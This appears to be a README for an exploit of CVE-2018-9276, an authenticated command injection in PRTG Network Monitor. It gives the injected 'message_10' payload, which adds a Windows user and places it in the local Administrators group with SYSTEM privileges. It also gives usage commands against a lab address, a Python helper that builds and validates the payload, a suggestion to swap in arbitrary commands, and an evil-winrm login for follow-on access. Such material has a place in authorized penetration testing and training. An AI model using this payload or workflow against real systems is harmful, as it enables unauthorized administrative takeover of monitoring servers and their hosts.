This script exploits CVE-2018-9276, an authenticated OS command injection in PRTG Network Monitor (fixed in version 18.2.39), to add a local user on the PRTG host and place that user in the Administrators group. The vulnerable notification endpoint is only reachable with a PRTG administrator session, so valid PRTG admin credentials are a prerequisite. This script is intended for educational and authorized penetration testing purposes only. Do not use it on systems without explicit permission.
- Python 3.x
- `requests` library (can be installed with `pip install requests`)
```
git clone https://github.com/your_username/your_repository.git
cd your_repository
```

The script is run from the command line and requires the following arguments:
```
python exploit_prtg.py -u http://10.10.10.152 --user new_user --password "Password123!"
```

- `-u` or `--url`: The base URL of the PRTG server (e.g., `http://10.10.10.152`).
- `--user`: The username you want to add to the system.
- `--password`: The password for the user being added. It is recommended that the password be more than 9 characters long and include uppercase letters, numbers, and special characters.
```
python exploit_prtg.py -u http://10.10.10.152 --user eviluserrrr --password "EvilUser1234!"
```

- Username: PRTG may require the username to be at least 9 characters long; the user is created with `net user` on the Windows host, so Windows account-name rules (20-character maximum, no `"/\[]:;|=,+*?<>`) also apply.
- Password: Make sure the password meets the host's Windows complexity requirements (uppercase and lowercase letters, numbers, and special characters). Avoid spaces and characters such as `;`, `|`, `$` or quotes, which would break the injected command line.
This script injects into the `message_10` field of the POST request body, which the script uses as the parameter passed to PRTG's "Execute Program" demo notification. PRTG hands that parameter to the demo PowerShell script without sanitizing it, so everything after `test.txt;` is executed as additional PowerShell statements. Because the PRTG core server service runs as Local System, the injected commands run with SYSTEM privileges, which is why the script can create a user and add them to the local Administrators group.

In the `message_10` parameter, the script currently sends:

```
test.txt;net user {args.user} {args.password} /add;net localgroup Administrators {args.user} /add
```

`test.txt` satisfies the demo script's expected output-file argument; the `;` ends that statement. You can modify the commands after it to execute other arbitrary commands as needed.
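As an added example (not the repository's script, and the function names and exact checks below are assumptions chosen for illustration), this is how the injected parameter can be built and sanity-checked before it is sent: it enforces the username and password rules noted above, refuses characters that would break the injected PowerShell command line, and shows how PowerShell will split the parameter into statements.

```python
"""
Build and sanity-check the injected notification parameter used by the
CVE-2018-9276 exploit described in this README. Added example, not the
repository's own code; helper names and thresholds are assumptions.
"""

# Characters Windows does not allow in local account names.
WINDOWS_USERNAME_FORBIDDEN = set('"/\\[]:;|=,+*?<>')
# Characters that would terminate, pipe, expand or quote inside the
# injected PowerShell statement. Assumption: reject rather than try to quote.
POWERSHELL_META = set(';|&$"\'`<>(){}')


def check_username(user: str) -> None:
    """Raise ValueError if `user` is unsafe to pass to `net user`.
    The 9-character minimum is the README's advice; 20 characters is
    the Windows maximum for a local account name."""
    if not 9 <= len(user) <= 20:
        raise ValueError("username must be 9..20 characters")
    bad = WINDOWS_USERNAME_FORBIDDEN & set(user)
    if bad or any(c.isspace() for c in user):
        raise ValueError(f"username contains forbidden characters: {sorted(bad)}")


def meets_windows_complexity(password: str, min_length: int = 10) -> bool:
    """Windows 'password must meet complexity requirements' rule: characters
    from at least three of the four classes. min_length (10) follows the
    README's 'more than 9 characters' recommendation, not a Windows default.
    The rule that the password must not contain the account name is omitted."""
    if len(password) < min_length:
        return False
    classes = [
        any(c.isupper() for c in password),
        any(c.islower() for c in password),
        any(c.isdigit() for c in password),
        any(not c.isalnum() for c in password),
    ]
    return sum(classes) >= 3


def check_password(password: str) -> None:
    """Raise ValueError if the password is weak or would break the injection."""
    if not meets_windows_complexity(password):
        raise ValueError("password does not meet Windows complexity rules")
    bad = POWERSHELL_META & set(password)
    if bad or any(c.isspace() for c in password):
        raise ValueError(f"password contains characters that break the injection: {sorted(bad)}")


def build_exe_params(user: str, password: str) -> str:
    """Return the value to send as the notification parameter.
    'test.txt' satisfies the demo script's output-file argument; the ';'
    ends that statement and the rest runs as further PowerShell statements
    under the SYSTEM account the PRTG core server runs as."""
    check_username(user)
    check_password(password)
    return (f"test.txt;net user {user} {password} /add;"
            f"net localgroup Administrators {user} /add")


def injected_statements(params: str) -> list:
    """Show how PowerShell will split the parameter: one statement per ';'."""
    return [s.strip() for s in params.split(";") if s.strip()]


if __name__ == "__main__":
    payload = build_exe_params("eviluserrrr", "EvilUser1234!")
    for statement in injected_statements(payload):
        print(statement)
```

Run the module directly to see the three statements the target will execute for the README's example credentials; any username or password that fails the checks raises a `ValueError` before anything is sent.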
To gain access to the system once the user has been added to the Administrators group, it is recommended to log in with evil-winrm:

```
evil-winrm -i 10.10.10.152 -u eviluserrrr -p "EvilUser1234!"
```

This script and the information provided here are for educational purposes and security testing in controlled environments with explicit permission only. Do not use it on systems you are not authorized to test, as doing so could be illegal.
[backglass]
Thanks to https://codewtch.org/2018/06/25/prtg-18-2-39-command-injection-vulnerability/ for the information on the vulnerability.
